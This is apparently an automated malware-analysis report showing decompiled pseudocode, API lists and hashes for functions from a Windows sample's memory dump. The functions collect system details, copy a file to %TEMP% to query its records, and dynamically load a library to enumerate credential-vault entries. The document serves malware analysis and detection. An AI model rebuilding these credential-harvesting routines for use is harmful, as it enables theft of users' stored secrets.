                                                                                                                                                                                          • API ID: FreeString$InfoSystem
                                                                                                                                                                                          • String ID: CPU Count: $CPU Model: $GetRAM: $SEFSRFdBUkVcREVTQ1JJUFRJT05cU3lzdGVtXENlbnRyYWxQcm9jZXNzb3JcMA==$UHJvY2Vzc29yTmFtZVN0cmluZw==$Video Info
                                                                                                                                                                                          • API String ID: 4070941872-1038824218
                                                                                                                                                                                          • Opcode ID: c93147df2423285c54bad4dc95c4c660ec513e1a04b46fc35375619ea2add05a
                                                                                                                                                                                          • Instruction ID: 0500c902736339f4efa0b07d3f9bc907855da1606bbc95f65d7857d0c3659172
                                                                                                                                                                                          • Opcode Fuzzy Hash: c93147df2423285c54bad4dc95c4c660ec513e1a04b46fc35375619ea2add05a
                                                                                                                                                                                          • Instruction Fuzzy Hash: 27410F70A1010DABDB01FFD1D882EDDBBB9EF48709F61403BF504B7296D639EA458A58
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00403368, Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 38filewindowCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 79%
                                                                                                                                                                                          			E00403368(void* __ecx) {
				long _v4;
				int _t3;

				if( *0x41c034 == 0) {
					if( *0x41b024 == 0) {
						_t3 = MessageBoxA(0, "Runtime error     at 00000000", "Error", 0);
					}
					return _t3;
				} else {
					if( *0x41c208 == 0xd7b2 &&  *0x41c210 > 0) {
						 *0x41c220();
					}
					WriteFile(GetStdHandle(0xfffffff5), "Runtime error     at 00000000", 0x1e,  &_v4, 0);
					return WriteFile(GetStdHandle(0xfffffff5), E004033F0, 2,  &_v4, 0);
				}
			}





                                                                                                                                                                                          0x00403370
                                                                                                                                                                                          0x004033d0
                                                                                                                                                                                          0x004033e0
                                                                                                                                                                                          0x004033e0
                                                                                                                                                                                          0x004033e6
                                                                                                                                                                                          0x00403372
                                                                                                                                                                                          0x0040337b
                                                                                                                                                                                          0x0040338b
                                                                                                                                                                                          0x0040338b
                                                                                                                                                                                          0x004033a7
                                                                                                                                                                                          0x004033c8
                                                                                                                                                                                          0x004033c8

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetStdHandle.KERNEL32(000000F5,Runtime error at 00000000,0000001E,0041A69E,00000000,?,00403436,?,?,?,00000002,004034D6,004025CB,0040260E,?,00000000), ref: 004033A1
                                                                                                                                                                                          • WriteFile.KERNEL32(00000000,000000F5,Runtime error at 00000000,0000001E,0041A69E,00000000,?,00403436,?,?,?,00000002,004034D6,004025CB,0040260E), ref: 004033A7
                                                                                                                                                                                          • GetStdHandle.KERNEL32(000000F5,004033F0,00000002,0041A69E,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,0041A69E,00000000,?,00403436), ref: 004033BC
                                                                                                                                                                                          • WriteFile.KERNEL32(00000000,000000F5,004033F0,00000002,0041A69E,00000000,00000000,000000F5,Runtime error at 00000000,0000001E,0041A69E,00000000,?,00403436), ref: 004033C2
                                                                                                                                                                                          • MessageBoxA.USER32 ref: 004033E0
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: FileHandleWrite$Message
                                                                                                                                                                                          • String ID: Error$Runtime error at 00000000
                                                                                                                                                                                          • API String ID: 1570097196-2970929446
                                                                                                                                                                                          • Opcode ID: 0a4cf132a8cfaff0af1c5c0ffc7350712d2b813a546a0a59a711f5fd8d927d65
                                                                                                                                                                                          • Instruction ID: 272384808b0d926620c8a29f01af81f970e1c010559b5e4fcbf7d036ebb79ccd
                                                                                                                                                                                          • Opcode Fuzzy Hash: 0a4cf132a8cfaff0af1c5c0ffc7350712d2b813a546a0a59a711f5fd8d927d65
                                                                                                                                                                                          • Instruction Fuzzy Hash: F5F09670AC03847AE620A7915DCAF9B2A5C8708F15F20867BB660744E5DBBC55C4525D
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00402668, Relevance: 11.4, APIs: 9, Instructions: 109COMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 100%
                                                                                                                                                                                          			E00402668(CHAR* __eax, intOrPtr* __edx) {
				char _t5;
				char _t6;
				CHAR* _t7;
				char _t9;
				CHAR* _t11;
				char _t14;
				CHAR* _t15;
				char _t17;
				CHAR* _t19;
				CHAR* _t22;
				CHAR* _t23;
				CHAR* _t32;
				intOrPtr _t33;
				intOrPtr* _t34;
				void* _t35;
				void* _t36;

				_t34 = __edx;
				_t22 = __eax;
				while(1) {
					L2:
					_t5 =  *_t22;
					if(_t5 != 0 && _t5 <= 0x20) {
						_t22 = CharNextA(_t22);
					}
					L2:
					_t5 =  *_t22;
					if(_t5 != 0 && _t5 <= 0x20) {
						_t22 = CharNextA(_t22);
					}
					L4:
					if( *_t22 != 0x22 || _t22[1] != 0x22) {
						_t36 = 0;
						_t32 = _t22;
						while(1) {
							_t6 =  *_t22;
							if(_t6 <= 0x20) {
								break;
							}
							if(_t6 != 0x22) {
								_t7 = CharNextA(_t22);
								_t36 = _t36 + _t7 - _t22;
								_t22 = _t7;
								continue;
							}
							_t22 = CharNextA(_t22);
							while(1) {
								_t9 =  *_t22;
								if(_t9 == 0 || _t9 == 0x22) {
									break;
								}
								_t11 = CharNextA(_t22);
								_t36 = _t36 + _t11 - _t22;
								_t22 = _t11;
							}
							if( *_t22 != 0) {
								_t22 = CharNextA(_t22);
							}
						}
						E00403AC0(_t34, _t36);
						_t23 = _t32;
						_t33 =  *_t34;
						_t35 = 0;
						while(1) {
							_t14 =  *_t23;
							if(_t14 <= 0x20) {
								break;
							}
							if(_t14 != 0x22) {
								_t15 = CharNextA(_t23);
								if(_t15 <= _t23) {
									continue;
								} else {
									goto L27;
								}
								do {
									L27:
									 *((char*)(_t33 + _t35)) =  *_t23;
									_t23 =  &(_t23[1]);
									_t35 = _t35 + 1;
								} while (_t15 > _t23);
								continue;
							}
							_t23 = CharNextA(_t23);
							while(1) {
								_t17 =  *_t23;
								if(_t17 == 0 || _t17 == 0x22) {
									break;
								}
								_t19 = CharNextA(_t23);
								if(_t19 <= _t23) {
									continue;
								} else {
									goto L21;
								}
								do {
									L21:
									 *((char*)(_t33 + _t35)) =  *_t23;
									_t23 =  &(_t23[1]);
									_t35 = _t35 + 1;
								} while (_t19 > _t23);
							}
							if( *_t23 != 0) {
								_t23 = CharNextA(_t23);
							}
						}
						return _t23;
					} else {
						_t22 =  &(_t22[2]);
						continue;
					}
				}
			}



















                                                                                                                                                                                          0x0040266c
                                                                                                                                                                                          0x0040266e
                                                                                                                                                                                          0x0040267a
                                                                                                                                                                                          0x0040267a
                                                                                                                                                                                          0x0040267a
                                                                                                                                                                                          0x0040267e
                                                                                                                                                                                          0x00402678
                                                                                                                                                                                          0x00402678
                                                                                                                                                                                          0x0040267a
                                                                                                                                                                                          0x0040267a
                                                                                                                                                                                          0x0040267e
                                                                                                                                                                                          0x00402678
                                                                                                                                                                                          0x00402678
                                                                                                                                                                                          0x00402684
                                                                                                                                                                                          0x00402687
                                                                                                                                                                                          0x00402694
                                                                                                                                                                                          0x00402696
                                                                                                                                                                                          0x004026dd
                                                                                                                                                                                          0x004026dd
                                                                                                                                                                                          0x004026e1
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0040269c
                                                                                                                                                                                          0x004026d0
                                                                                                                                                                                          0x004026d9
                                                                                                                                                                                          0x004026db
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004026db
                                                                                                                                                                                          0x004026a4
                                                                                                                                                                                          0x004026b6
                                                                                                                                                                                          0x004026b6
                                                                                                                                                                                          0x004026ba
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004026a9
                                                                                                                                                                                          0x004026b2
                                                                                                                                                                                          0x004026b4
                                                                                                                                                                                          0x004026b4
                                                                                                                                                                                          0x004026c3
                                                                                                                                                                                          0x004026cb
                                                                                                                                                                                          0x004026cb
                                                                                                                                                                                          0x004026c3
                                                                                                                                                                                          0x004026e7
                                                                                                                                                                                          0x004026ec
                                                                                                                                                                                          0x004026ee
                                                                                                                                                                                          0x004026f0
                                                                                                                                                                                          0x00402745
                                                                                                                                                                                          0x00402745
                                                                                                                                                                                          0x00402749
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x004026f6
                                                                                                                                                                                          0x00402731
                                                                                                                                                                                          0x00402738
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0040273a
                                                                                                                                                                                          0x0040273a
                                                                                                                                                                                          0x0040273c
                                                                                                                                                                                          0x0040273f
                                                                                                                                                                                          0x00402740
                                                                                                                                                                                          0x00402741
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0040273a
                                                                                                                                                                                          0x004026fe
                                                                                                                                                                                          0x00402717
                                                                                                                                                                                          0x00402717
                                                                                                                                                                                          0x0040271b
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00402703
                                                                                                                                                                                          0x0040270a
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0040270c
                                                                                                                                                                                          0x0040270c
                                                                                                                                                                                          0x0040270e
                                                                                                                                                                                          0x00402711
                                                                                                                                                                                          0x00402712
                                                                                                                                                                                          0x00402713
                                                                                                                                                                                          0x0040270c
                                                                                                                                                                                          0x00402724
                                                                                                                                                                                          0x0040272c
                                                                                                                                                                                          0x0040272c
                                                                                                                                                                                          0x00402724
                                                                                                                                                                                          0x00402751
                                                                                                                                                                                          0x0040268f
                                                                                                                                                                                          0x0040268f
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x0040268f
                                                                                                                                                                                          0x00402687

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • CharNextA.USER32(00000000,?,00000000,00000000,?,0040279A,-00000001,0041B0FC,0000044D,00419E83,?), ref: 0040269F
                                                                                                                                                                                          • CharNextA.USER32(00000000,00000000,?,00000000,00000000,?,0040279A,-00000001,0041B0FC,0000044D,00419E83,?), ref: 004026A9
                                                                                                                                                                                          • CharNextA.USER32(00000000,00000000,?,00000000,00000000,?,0040279A,-00000001,0041B0FC,0000044D,00419E83,?), ref: 004026C6
                                                                                                                                                                                          • CharNextA.USER32(00000000,?,00000000,00000000,?,0040279A,-00000001,0041B0FC,0000044D,00419E83,?), ref: 004026D0
                                                                                                                                                                                          • CharNextA.USER32(00000000,00000000,?,00000000,00000000,?,0040279A,-00000001,0041B0FC,0000044D,00419E83,?), ref: 004026F9
                                                                                                                                                                                          • CharNextA.USER32(00000000,00000000,00000000,?,00000000,00000000,?,0040279A,-00000001,0041B0FC,0000044D,00419E83,?), ref: 00402703
                                                                                                                                                                                          • CharNextA.USER32(00000000,00000000,00000000,?,00000000,00000000,?,0040279A,-00000001,0041B0FC,0000044D,00419E83,?), ref: 00402727
                                                                                                                                                                                          • CharNextA.USER32(00000000,00000000,?,00000000,00000000,?,0040279A,-00000001,0041B0FC,0000044D,00419E83,?), ref: 00402731
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CharNext
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3213498283-0
                                                                                                                                                                                          • Opcode ID: b7f289542d20783a7460a3fa223e5cf14214bb8296ee11ce479d6e83d044995d
                                                                                                                                                                                          • Instruction ID: 5b28f76bfa796ab2381ca360e83c3cb8d2614de50686c14b6561fe7fc9f0b368
                                                                                                                                                                                          • Opcode Fuzzy Hash: b7f289542d20783a7460a3fa223e5cf14214bb8296ee11ce479d6e83d044995d
                                                                                                                                                                                          • Instruction Fuzzy Hash: B021E7546043951ADB31297A0AC877B6B894A5B304B68087BD0C1BB3D7D4FE4C8B832D
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 00410E70, Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 239fileCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 45%
                                                                                                                                                                                          			E00410E70(char __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				char _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				intOrPtr _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				WCHAR* _t87;
				intOrPtr* _t102;
				intOrPtr _t104;
				intOrPtr* _t106;
				intOrPtr* _t110;
				intOrPtr* _t147;
				intOrPtr _t149;
				intOrPtr* _t151;
				void* _t153;
				intOrPtr* _t155;
				intOrPtr* _t159;
				void* _t161;
				intOrPtr* _t166;
				intOrPtr* _t172;
				intOrPtr* _t178;
				void* _t180;
				intOrPtr* _t184;
				void* _t187;
				intOrPtr _t208;
				intOrPtr _t210;
				void* _t216;
				intOrPtr _t222;
				intOrPtr _t226;
				intOrPtr _t227;
				void* _t228;
				void* _t229;

				_t224 = __esi;
				_t186 = __ebx;
				_t226 = _t227;
				_t187 = 0xb;
				do {
					_push(0);
					_push(0);
					_t187 = _t187 - 1;
					_t234 = _t187;
				} while (_t187 != 0);
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v12 = __edx;
				_v8 = __eax;
				E004040F4( &_v8);
				_push(_t226);
				_push(0x411163);
				_push( *[fs:eax]);
				 *[fs:eax] = _t227;
				E00403B80( &_v28);
				_push(_t226);
				_push(0x4110ce);
				_push( *[fs:eax]);
				 *[fs:eax] = _t227;
				E00406FDC(GetTickCount(), __ebx,  &_v52, __esi, _t234);
				_push(_v52);
				E00406F1C( &_v56, __ebx, __edi, __esi, _t234);
				_push(_v56);
				_push(L".tmp");
				E00403E1C();
				E0040781C(_v8, _t186,  &_v40, _t234);
				E004062D8(L"%TEMP%",  &_v64, _t234);
				_push(_v64);
				_push(0x41119c);
				_push(_v32);
				E00403E1C();
				E0040781C(_v60, _t186,  &_v44, _t234);
				_t87 = E00403D3C(_v44);
				CopyFileW(E00403D3C(_v40), _t87, 0xffffffff);
				E0040377C( &_v68, _v44);
				E00404AFC(_v68, _t186, _t187,  &_v36, _t224, _t234);
				E00403D2C( &_v72, _v36);
				if(E004076B0(_v72, _t186, _t187) != 0) {
					_t102 =  *0x41b55c; // 0x41c784
					_t104 =  *((intOrPtr*)( *_t102))(E00403990(_v36),  &_v16);
					_t228 = _t227 + 8;
					__eflags = _t104;
					if(_t104 == 0) {
						E00408120(0x66,  &_v76);
						_t147 =  *0x41b5cc; // 0x41c78c
						_t149 =  *((intOrPtr*)( *_t147))(_v16, E00403990(_v76), 0xffffffff,  &_v20,  &_v24);
						_t229 = _t228 + 0x14;
						__eflags = _t149;
						if(_t149 == 0) {
							while(1) {
								_t151 =  *0x41b600; // 0x41c790
								_t153 =  *((intOrPtr*)( *_t151))(_v20);
								__eflags = _t153 - 0x64;
								if(_t153 != 0x64) {
									goto L9;
								}
								_t155 =  *0x41b644; // 0x41c798
								_t159 =  *0x41b588; // 0x41c794
								_t161 =  *((intOrPtr*)( *_t159))(_v20, 3,  *((intOrPtr*)( *_t155))(_v20, 3));
								_pop(_t216);
								E004094C4(_t161,  &_v48, _t216);
								E00403D2C( &_v80, _v48);
								_t166 =  *0x41b588; // 0x41c794
								E00403C98( &_v84,  *((intOrPtr*)( *_t166))(_v20, 0, 0x4111a4, _v80, _v28));
								_t172 =  *0x41b588; // 0x41c794
								E00403C98( &_v88,  *((intOrPtr*)( *_t172))(_v20, 1, 0x4111a4, _v84));
								_t178 =  *0x41b588; // 0x41c794
								_t180 =  *((intOrPtr*)( *_t178))(_v20, 2, 0x4111b0, _v88);
								_t229 = _t229 + 0x28;
								E00403C98( &_v92, _t180);
								_push(_v92);
								_push(L"\r\n\r\n");
								E00403E1C();
								_t184 =  *0x41b584; // 0x41b0b4
								 *_t184 =  *_t184 + 1;
								__eflags =  *_t184;
							}
						}
					}
					L9:
					_t106 =  *0x41b654; // 0x41c79c
					 *((intOrPtr*)( *_t106))(_v20);
					_t110 =  *0x41b590; // 0x41c788
					 *((intOrPtr*)( *_t110))(_v16);
					_pop(_t208);
					 *[fs:eax] = _t208;
					E00403BBC(_v12, _v28);
					DeleteFileW(E00403D3C(_v44));
				} else {
					_pop(_t222);
					 *[fs:eax] = _t222;
				}
				_pop(_t210);
				 *[fs:eax] = _t210;
				_push(E0041116A);
				E00403B98( &_v92, 4);
				E004034E4( &_v76);
				E00403B80( &_v72);
				E004034E4( &_v68);
				E00403B98( &_v64, 4);
				E004034E4( &_v48);
				E00403B98( &_v44, 2);
				E004034E4( &_v36);
				E00403B98( &_v32, 2);
				return E00403B80( &_v8);
			}



















































                                                                                                                                                                                          0x00410e70
                                                                                                                                                                                          0x00410e70
                                                                                                                                                                                          0x00410e71
                                                                                                                                                                                          0x00410e73
                                                                                                                                                                                          0x00410e78
                                                                                                                                                                                          0x00410e78
                                                                                                                                                                                          0x00410e7a
                                                                                                                                                                                          0x00410e7c
                                                                                                                                                                                          0x00410e7c
                                                                                                                                                                                          0x00410e7c
                                                                                                                                                                                          0x00410e7f
                                                                                                                                                                                          0x00410e80
                                                                                                                                                                                          0x00410e81
                                                                                                                                                                                          0x00410e82
                                                                                                                                                                                          0x00410e85
                                                                                                                                                                                          0x00410e8b
                                                                                                                                                                                          0x00410e92
                                                                                                                                                                                          0x00410e93
                                                                                                                                                                                          0x00410e98
                                                                                                                                                                                          0x00410e9b
                                                                                                                                                                                          0x00410ea1
                                                                                                                                                                                          0x00410ea8
                                                                                                                                                                                          0x00410ea9
                                                                                                                                                                                          0x00410eae
                                                                                                                                                                                          0x00410eb1
                                                                                                                                                                                          0x00410ebc
                                                                                                                                                                                          0x00410ec1
                                                                                                                                                                                          0x00410ec7
                                                                                                                                                                                          0x00410ecc
                                                                                                                                                                                          0x00410ecf
                                                                                                                                                                                          0x00410edc
                                                                                                                                                                                          0x00410ee7
                                                                                                                                                                                          0x00410ef4
                                                                                                                                                                                          0x00410ef9
                                                                                                                                                                                          0x00410efc
                                                                                                                                                                                          0x00410f01
                                                                                                                                                                                          0x00410f0c
                                                                                                                                                                                          0x00410f17
                                                                                                                                                                                          0x00410f21
                                                                                                                                                                                          0x00410f30
                                                                                                                                                                                          0x00410f3b
                                                                                                                                                                                          0x00410f46
                                                                                                                                                                                          0x00410f51
                                                                                                                                                                                          0x00410f60
                                                                                                                                                                                          0x00410f7c
                                                                                                                                                                                          0x00410f83
                                                                                                                                                                                          0x00410f85
                                                                                                                                                                                          0x00410f88
                                                                                                                                                                                          0x00410f8a
                                                                                                                                                                                          0x00410fa2
                                                                                                                                                                                          0x00410fb4
                                                                                                                                                                                          0x00410fbb
                                                                                                                                                                                          0x00410fbd
                                                                                                                                                                                          0x00410fc0
                                                                                                                                                                                          0x00410fc2
                                                                                                                                                                                          0x00411091
                                                                                                                                                                                          0x00411095
                                                                                                                                                                                          0x0041109c
                                                                                                                                                                                          0x0041109f
                                                                                                                                                                                          0x004110a2
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00000000
                                                                                                                                                                                          0x00410fd3
                                                                                                                                                                                          0x00410fe6
                                                                                                                                                                                          0x00410fed
                                                                                                                                                                                          0x00410ff5
                                                                                                                                                                                          0x00410ff6
                                                                                                                                                                                          0x00411004
                                                                                                                                                                                          0x00411017
                                                                                                                                                                                          0x00411028
                                                                                                                                                                                          0x0041103b
                                                                                                                                                                                          0x0041104c
                                                                                                                                                                                          0x0041105f
                                                                                                                                                                                          0x00411066
                                                                                                                                                                                          0x00411068
                                                                                                                                                                                          0x00411070
                                                                                                                                                                                          0x00411075
                                                                                                                                                                                          0x00411078
                                                                                                                                                                                          0x00411085
                                                                                                                                                                                          0x0041108a
                                                                                                                                                                                          0x0041108f
                                                                                                                                                                                          0x0041108f
                                                                                                                                                                                          0x0041108f
                                                                                                                                                                                          0x00411091
                                                                                                                                                                                          0x00410fc2
                                                                                                                                                                                          0x004110a8
                                                                                                                                                                                          0x004110ac
                                                                                                                                                                                          0x004110b3
                                                                                                                                                                                          0x004110ba
                                                                                                                                                                                          0x004110c1
                                                                                                                                                                                          0x004110c6
                                                                                                                                                                                          0x004110c9
                                                                                                                                                                                          0x004110de
                                                                                                                                                                                          0x004110ec
                                                                                                                                                                                          0x00410f62
                                                                                                                                                                                          0x00410f64
                                                                                                                                                                                          0x00410f67
                                                                                                                                                                                          0x00410f67
                                                                                                                                                                                          0x004110f3
                                                                                                                                                                                          0x004110f6
                                                                                                                                                                                          0x004110f9
                                                                                                                                                                                          0x00411106
                                                                                                                                                                                          0x0041110e
                                                                                                                                                                                          0x00411116
                                                                                                                                                                                          0x0041111e
                                                                                                                                                                                          0x0041112b
                                                                                                                                                                                          0x00411133
                                                                                                                                                                                          0x00411140
                                                                                                                                                                                          0x00411148
                                                                                                                                                                                          0x00411155
                                                                                                                                                                                          0x00411162

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetTickCount.KERNEL32 ref: 00410EB4
                                                                                                                                                                                          • CopyFileW.KERNEL32(00000000,00000000,000000FF,?,0041119C,?,.tmp,?,?,00000000,004110CE,?,00000000,00411163,?,00000000), ref: 00410F30
                                                                                                                                                                                          • DeleteFileW.KERNEL32(00000000), ref: 004110EC
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000006.00000002.371678133.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Yara matches
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$CopyCountDeleteTick
                                                                                                                                                                                          • String ID: $%TEMP%$.tmp
                                                                                                                                                                                          • API String ID: 2381671008-2792595090
                                                                                                                                                                                          • Opcode ID: 25513a2d6d90f056bd5cf02fe9c1dff5265798498166ca8350b0b3102dd1fa50
                                                                                                                                                                                          • Instruction ID: ef1d9ef4a41f0d536355ae74e23377fcfc6b42a5aa152db35adc264ec6821d93
                                                                                                                                                                                          • Opcode Fuzzy Hash: 25513a2d6d90f056bd5cf02fe9c1dff5265798498166ca8350b0b3102dd1fa50
                                                                                                                                                                                          • Instruction Fuzzy Hash: 55910B31A40109AFDB00EB95DC82EDEBBB9EF48315F104436F514F72A2DB78AE458B58
                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                          Function 0040B15C, Relevance: 9.2, APIs: 6, Instructions: 198libraryloaderCOMMON
                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                          C-Code - Quality: 49%
                                                                                                                                                                                          			E0040B15C(void* __ebx, void* __edi, void* __esi) {
				_Unknown_base(*)()* _v8;
				char _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v52;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				char _v96;
				char _v100;
				char _v104;
				CHAR* _t72;
				_Unknown_base(*)()* _t111;
				intOrPtr* _t157;
				struct HINSTANCE__* _t158;
				signed int _t159;
				void* _t160;
				intOrPtr _t170;
				intOrPtr _t175;
				intOrPtr _t179;
				intOrPtr* _t192;
				void* _t194;
				void* _t195;
				signed int _t200;
				intOrPtr _t202;
				intOrPtr _t203;

				_t202 = _t203;
				_t160 = 0xc;
				do {
					_push(0);
					_push(0);
					_t160 = _t160 - 1;
				} while (_t160 != 0);
				 *[fs:eax] = _t203;
				E00408120(0x9b,  &_v72);
				_t72 = E00403990(_v72);
				E00408120(0x9a,  &_v76);
				_t157 = GetProcAddress(LoadLibraryA(E00403990(_v76)), _t72);
				E0040813C(0x9c,  &_v80);
				 *_t157(E00403D3C(_v80),  &_v52,  *[fs:eax], 0x40b3c3, _t202, __edi, __esi, __ebx, _t160);
				E0040813C(0x9d,  &_v84);
				 *_t157(E00403D3C(_v84),  &_v68);
				E00408120(0x9e,  &_v88);
				_t158 = LoadLibraryA(E00403990(_v88));
				if(_t158 != 0) {
					E00408120(0x9f,  &_v92);
					_t111 = GetProcAddress(_t158, E00403990(_v92));
					E00408120(0xa0,  &_v96);
					_t192 = GetProcAddress(_t158, E00403990(_v96));
					E00408120(0xa1,  &_v100);
					_v8 = GetProcAddress(_t158, E00403990(_v100));
					_v12 = 0;
					_push( &_v16);
					_push(0);
					_push( &_v52);
					if( *_t111() == 0) {
						_push( &_v20);
						_push( &_v12);
						_push(0x200);
						_push(_v16);
						if( *_t192() == 0) {
							_t194 = _v12 - 1;
							if(_t194 >= 0) {
								_t195 = _t194 + 1;
								_t159 = 0;
								do {
									_t179 =  *0x40b130; // 0x40b134
									E004047B4( &_v24, _t179);
									_push( &_v24);
									_push(0);
									_push(0);
									_push(0);
									_t200 = (_t159 << 3) - _t159;
									_push( *((intOrPtr*)(_v20 + 0x18 + _t200 * 8)));
									_push( *((intOrPtr*)(_v20 + 0x14 + _t200 * 8)));
									_push( &_v68);
									_push(_v16);
									if(_v8() == 0) {
										E0040370C( &_v28,  *((intOrPtr*)( *((intOrPtr*)(_v20 + 0x14 + _t200 * 8)) + 0x10)));
										E0040370C( &_v32,  *((intOrPtr*)( *((intOrPtr*)(_v20 + 0x18 + _t200 * 8)) + 0x10)));
										E0040370C( &_v36,  *((intOrPtr*)( *((intOrPtr*)(_v24 + 0x1c)) + 0x10)));
										if(E00403790(_v28) != 0 && E00403790(_v36) != 0) {
											E00408120(0xa2,  &_v104);
											E00405210(0x40b3e8, _t159, _v28, _v104, _t195, _t200, 0x40b3dc, _v36, _v32);
										}
									}
									_t159 = _t159 + 1;
									_t195 = _t195 - 1;
								} while (_t195 != 0);
							}
						}
					}
				}
				_pop(_t170);
				 *[fs:eax] = _t170;
				_push(E0040B3CA);
				E00403508( &_v104, 5);
				E00403B98( &_v84, 2);
				E00403508( &_v76, 2);
				E00403508( &_v36, 3);
				_t175 =  *0x40b130; // 0x40b134
				return E00404224( &_v24, 2, _t175);
			}





































                                                                                                                                                                                          0x0040b15d
                                                                                                                                                                                          0x0040b15f
                                                                                                                                                                                          0x0040b164
                                                                                                                                                                                          0x0040b164
                                                                                                                                                                                          0x0040b166
                                                                                                                                                                                          0x0040b168
                                                                                                                                                                                          0x0040b168
                                                                                                                                                                                          0x0040b17a
                                                                                                                                                                                          0x0040b185
                                                                                                                                                                                          0x0040b18d
                                                                                                                                                                                          0x0040b19b
                                                                                                                                                                                          0x0040b1b4
                                                                                                                                                                                          0x0040b1c2
                                                                                                                                                                                          0x0040b1d0
                                                                                                                                                                                          0x0040b1de
                                                                                                                                                                                          0x0040b1ec
                                                                                                                                                                                          0x0040b1f6
                                                                                                                                                                                          0x0040b209
                                                                                                                                                                                          0x0040b20d
                                                                                                                                                                                          0x0040b21b
                                                                                                                                                                                          0x0040b22a
                                                                                                                                                                                          0x0040b239
                                                                                                                                                                                          0x0040b24d
                                                                                                                                                                                          0x0040b257
                                                                                                                                                                                          0x0040b26b
                                                                                                                                                                                          0x0040b270
                                                                                                                                                                                          0x0040b276
                                                                                                                                                                                          0x0040b277
                                                                                                                                                                                          0x0040b27c
                                                                                                                                                                                          0x0040b281
                                                                                                                                                                                          0x0040b28a
                                                                                                                                                                                          0x0040b28e
                                                                                                                                                                                          0x0040b28f
                                                                                                                                                                                          0x0040b297
                                                                                                                                                                                          0x0040b29c
                                                                                                                                                                                          0x0040b2a5
                                                                                                                                                                                          0x0040b2a8
                                                                                                                                                                                          0x0040b2ae
                                                                                                                                                                                          0x0040b2af
                                                                                                                                                                                          0x0040b2b1
                                                                                                                                                                                          0x0040b2b4
                                                                                                                                                                                          0x0040b2ba
                                                                                                                                                                                          0x0040b2c2
                                                                                                                                                                                          0x0040b2c3
                                                                                                                                                                                          0x0040b2c5
                                                                                                                                                                                          0x0040b2c7
                                                                                                                                                                                          0x0040b2ce
                                                                                                                                                                                          0x0040b2d7
                                                                                                                                                                                          0x0040b2df
                                                                                                                                                                                          0x0040b2e3
                                                                                                                                                                                          0x0040b2e7
                                                                                                                                                                                          0x0040b2ed
                                                                                                                                                                                          0x0040b2fc
                                                                                                                                                                                          0x0040b30e
                                                                                                                                                                                          0x0040b31f
                                                                                                                                                                                          0x0040b32e
                                                                                                                                                                                          0x0040b351
                                                                                                                                                                                          0x0040b361
                                                                                                                                                                                          0x0040b361
                                                                                                                                                                                          0x0040b32e
                                                                                                                                                                                          0x0040b366
                                                                                                                                                                                          0x0040b367
                                                                                                                                                                                          0x0040b367
                                                                                                                                                                                          0x0040b2b1
                                                                                                                                                                                          0x0040b2a8
                                                                                                                                                                                          0x0040b29c
                                                                                                                                                                                          0x0040b281
                                                                                                                                                                                          0x0040b370
                                                                                                                                                                                          0x0040b373
                                                                                                                                                                                          0x0040b376
                                                                                                                                                                                          0x0040b383
                                                                                                                                                                                          0x0040b390
                                                                                                                                                                                          0x0040b39d
                                                                                                                                                                                          0x0040b3aa
                                                                                                                                                                                          0x0040b3b2
